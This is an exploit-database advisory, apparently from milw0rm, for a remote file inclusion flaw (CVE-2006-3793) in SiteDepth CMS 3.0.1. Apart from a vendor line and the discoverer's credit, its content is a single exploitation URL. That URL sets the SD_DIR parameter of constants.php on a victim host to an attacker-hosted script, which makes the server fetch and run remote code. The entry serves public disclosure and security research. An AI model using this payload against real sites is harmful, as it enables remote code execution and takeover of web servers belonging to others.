SiteDepth CMS 3.0.1 - 'SD_DIR' Remote File Inclusion



EKU-ID: 10059 CVE: OSVDB-27412;CVE-2006-3793 OSVDB-ID:
Author: Aesthetico Published: 2006-07-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------

Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-07-20]